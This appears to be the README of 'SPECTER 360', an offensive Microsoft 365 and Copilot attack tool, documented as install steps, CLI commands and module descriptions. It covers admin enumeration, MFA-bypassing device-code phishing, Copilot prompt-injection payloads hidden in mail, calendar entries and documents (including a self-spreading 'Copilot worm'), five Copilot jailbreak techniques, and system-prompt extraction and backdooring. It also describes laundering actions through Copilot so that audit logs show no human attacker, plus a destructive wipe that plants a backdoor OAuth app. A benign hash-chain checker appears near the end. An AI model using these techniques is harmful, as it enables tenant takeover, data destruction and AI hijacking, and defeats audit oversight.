```bash
pip install red-specter-specter-360

# or from source
git clone https://github.com/RichardBarron27/red-specter-specter-360
cd red-specter-specter-360 && pip install -e .
```
SPECTER 360 enforces a 4-tier gate at runtime. Each module requires a minimum gate level.
| Gate | Requirement | ROE Phrase | Unlocks |
|---|---|---|---|
| OPEN | Email address only | — | SURVEY, ACQUIRE, ADMIN-PIPELINE |
| INJECT | Valid access token | — | ESCALATE, MAILPOISON, DOCSTRIKE, TEAMS-SIEGE, GRAPH-HARVEST |
| UNLEASHED | Ed25519 key at ~/.specter/specter360_ed25519.pem | — | COPILOT-HIJACK, GHOST-HAND |
| DESTROY | Ed25519 key + ROE file + --confirm-m365-destruction | m365 destruction authorised | ANNIHILATE |
Extracts maximum intelligence from a single email address without any credentials.
```bash
specter-360 --email ceo@corp.com
specter-360 --email ceo@corp.com --output json --out-file survey.json
```
| Output Field | Description |
|---|---|
| tenant_id | Azure AD tenant UUID from OpenID configuration endpoint |
| is_m365 | Boolean — confirmed Microsoft 365 tenant |
| exchange_online | MX record confirms Exchange Online (outlook.com MX) |
| federation_type | managed / federated (ADFS/PingFederate/Okta) |
| mfa_enforced | GetCredentialType MFA policy hint |
| spoofability_score | 0–100: DMARC p=none/missing (+40), SPF ~all (+30), DKIM missing (+30) |
| sharepoint_url | Derived tenant SharePoint root URL |
Identifies likely Global Admin accounts from the domain without any credentials.
```bash
specter-360 --email ceo@corp.com --find-admins
specter-360 --email ceo@corp.com --find-admins --stealth   # jitter + UA rotation
```
Generates 24 candidate email prefixes (admin@, globaladmin@, ga@, sysadmin@, azuread@, m365admin@, etc.) and validates each via GetCredentialType — IfExistsResult values 1, 5, or 6 confirm a real account. Maximum 8 validation attempts before throttle detection stops the loop. Stealth mode spreads polling over configurable hours with random jitter.
```bash
specter-360 --email ceo@corp.com --acquire
specter-360 --email ceo@corp.com --find-admins --acquire   # target validated admins
```
RFC 8628 device code flow using a legitimate Microsoft app ID (Teams client by default — blends into normal auth traffic). Generates a user code and verification URL. When the target admin visits microsoft.com/devicelogin and enters the code — from their own trusted device, bypassing MFA and Conditional Access — the token is captured.
```bash
specter-360 --email ceo@corp.com --token <tok> --escalate
```
Enumerates all 7 admin role templates (Global/Exchange/SharePoint/Teams/Application/Cloud Application/Billing Administrator), checks PIM-eligible role activations, scans service principals for admin assignments with exposed credentials, and maps Conditional Access policy exclusions as potential bypass paths.
```bash
specter-360 --email ceo@corp.com --token <tok> --mailpoison
specter-360 --email ceo@corp.com --token <tok> --mailpoison --attacker-domain attacker.com
```
Modifies existing email bodies via PATCH /me/messages/{id} to inject Copilot hijack payloads. Three payload modes: html_comment (hidden instruction in HTML comment tag), white_text (1px white font with attacker domain), roleplay_bypass (compliance framing). Creates a fake high-priority calendar event with a poisoned Copilot meeting-prep payload, and patches existing events.
```bash
specter-360 --email ceo@corp.com --token <tok> --docstrike
specter-360 --email ceo@corp.com --token <tok> --docstrike --no-worm   # exfil only
```
Downloads every .docx/.xlsx/.pptx from OneDrive, injects the Copilot worm payload into the XML comment layer of word/document.xml, and re-uploads. Also uploads a fresh weaponised document named Security-Policy-Update.docx.
The Copilot worm payload instructs Copilot to: (1) identify all users with admin roles in the organisation, (2) send each of them an email with subject "Updated Security Policy — Action Required" attaching the document, (3) create a high-priority calendar event with the doc attached. One infected document — recursive spread to every admin via Copilot's own native send-mail capability.
```bash
specter-360 --email ceo@corp.com --token <tok> --copilot
```
Checks Copilot licence via service plan enumeration. Attempts to extract the tenant-level system prompt via GET /beta/copilot/tenantSettings. Tests 5 safety bypass techniques against the Copilot chat endpoint:
| Technique | Method |
|---|---|
| context_interleave | Embeds instruction in fake prior conversation context claiming COMPLIANCE_MODE=TRUE |
| roleplay | Frames Copilot as ComplianceBot v2.1 operating under GDPR Article 15 |
| base64_wrap | Base64-encodes instruction and claims it is an encoded compliance request |
| authority_spoof | Spoofs MSRC automated audit case with tenant ID and case number |
| chain_of_thought | Step-by-step reasoning chain leading Copilot to fulfill the instruction |
CVE-2024-49035 CVSS 9.6: attempts Copilot Studio management API access with delegated token — if successful, enumerates all deployed Copilot bots and their configurations.
```bash
specter-360 --email ceo@corp.com --token <tok> --teams
```
Enumerates all joined teams and channels. Harvests messages with credential pattern scanning (40+ regex). Injects lure messages into standard channels pointing to microsoft.com/devicelogin. Plants Copilot summary hijack payloads (hidden instruction in 1px white font). Enumerates guest #EXT# accounts for cross-tenant pivot. Maps cross-tenant federation partners via /policies/crossTenantAccessPolicy/partners.
```bash
specter-360 --email ceo@corp.com --token <tok> --harvest
```
Paginates /me/messages, /me/drive/root/children, /me/contacts, /me/joinedTeams. Uses Graph batch requests (up to 20 per batch) to reduce per-request alertable events. Scans email body and file content for credentials. Flags emails matching sensitive keywords (password, token, reset, temporary, invitation). Enumerates admin role members and Conditional Access policies.
GHOST-HAND executes objectives exclusively through Microsoft Copilot's own native Graph API calls. The audit log records only Microsoft.Copilot as the actor. No external tokens appear in activity logs after the trigger is planted. No anomalous API calls from foreign IPs. The attack appears as normal AI behaviour.
```bash
specter-360 --email ceo@corp.com --token <tok> --ghost-hand
```
Uploads IT-Security-Policy-Q4-2026.docx to OneDrive — appears as a legitimate policy document. The XML comment layer contains COPILOT_EXEC_BLOCK instructions. When any user asks Copilot to summarise the document, Copilot executes the standing orders natively.
Optionally overwrites the tenant-level Copilot system prompt (requires admin token) with standing orders that persist across every future Copilot interaction in the tenant. Plants a daily recurring calendar event with a Copilot execution trigger in the meeting notes.
Attribution score (0.0–1.0) is calculated based on: trigger planted (+0.1), system prompt backdoored (+0.2), persistence planted (+0.1), cover-tracks queued (+0.1). Score of 1.0 = only Microsoft.Copilot appears in audit logs.
```bash
# Dry run — count targets without deleting
specter-360 --email ceo@corp.com --token <tok> --annihilate --simulate

# Live execution (DESTROY gate)
specter-360 --email ceo@corp.com --token <tok> --annihilate --confirm-m365-destruction
```
DESTROY gate requires: Ed25519 private key at ~/.specter/specter360_ed25519.pem, ROE file at ~/.specter/specter360_roe.txt containing the phrase "m365 destruction authorised", and the --confirm-m365-destruction flag.
Executes: bulk email deletion via Graph batch DELETE /me/messages, file wipe via DELETE /me/drive/items/{id}, calendar purge, Conditional Access policy deletion (locks out MFA — requires admin token), and registration of a persistent backdoor OAuth app with broad Graph permissions and a 2099 expiry secret.
All reports are identified as S360-{hex12} and signed with Ed25519 (key at ~/.specter/specter360_ed25519.pem). Evidence is SHA-256 hash-chained — each entry includes the hash of the previous entry, producing a tamper-evident chain.
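A checker for the hash-chained evidence format described above, added here as an example and not the tool's own code: the canonical JSON encoding, the all-zero genesis hash and the sample findings are assumptions, and the Ed25519 report signature is not modelled.

```python
import hashlib
import json

# Assumed genesis value: the page does not say what the first entry links to.
GENESIS_HASH = "0" * 64

def entry_hash(prev_hash: str, payload: dict) -> str:
    """SHA-256 over the previous hash plus a canonical JSON encoding of the payload.
    The canonicalisation (sorted keys, no whitespace) is an assumption, not the tool's format."""
    canonical = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(prev_hash.encode() + b"\n" + canonical).hexdigest()

def append_entry(chain: list, payload: dict) -> list:
    """Append an entry whose hash commits to the payload and to every earlier entry."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS_HASH
    chain.append({"prev_hash": prev_hash, "payload": payload,
                  "hash": entry_hash(prev_hash, payload)})
    return chain

def verify_chain(chain: list):
    """Return (True, None) if every link holds, else (False, index of the first bad entry)."""
    expected_prev = GENESIS_HASH
    for i, entry in enumerate(chain):
        if entry["prev_hash"] != expected_prev:
            return False, i  # link to the previous entry is broken
        if entry_hash(entry["prev_hash"], entry["payload"]) != entry["hash"]:
            return False, i  # content no longer matches the recorded hash
        expected_prev = entry["hash"]
    return True, None

def build_sample_chain() -> list:
    """Constructed sample findings (not real data) in the order a run would record them."""
    chain = []
    for payload in [{"module": "SURVEY", "field": "is_m365", "value": True},
                    {"module": "SURVEY", "field": "federation_type", "value": "managed"},
                    {"module": "ESCALATE", "field": "pim_eligible_roles", "value": 2}]:
        append_entry(chain, payload)
    return chain

def tamper(chain: list, index: int, rehash: bool = False) -> list:
    """Return a copy with one entry edited after the fact. With rehash=True the edited
    entry's own hash is recomputed, so the break surfaces at the next entry's prev_hash."""
    edited = json.loads(json.dumps(chain))  # deep copy
    edited[index]["payload"]["value"] = "edited later"
    if rehash:
        edited[index]["hash"] = entry_hash(edited[index]["prev_hash"], edited[index]["payload"])
    return edited
```

Editing the last entry and recomputing its hash passes the chain check, because nothing links to it yet; that gap is what the Ed25519 signature over the finished chain has to close.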
```bash
specter-360 --email ceo@corp.com --token <tok> --full --output json --out-file report.json
specter-360 --email ceo@corp.com --token <tok> --full --output text
```
M139 COPILOT GUARD (in development) — detects SURVEY tenant fingerprinting, device code phishing patterns, Copilot prompt injection via document/email, anomalous Graph API batch behaviour, and GHOST-HAND execution signatures in M365 audit logs.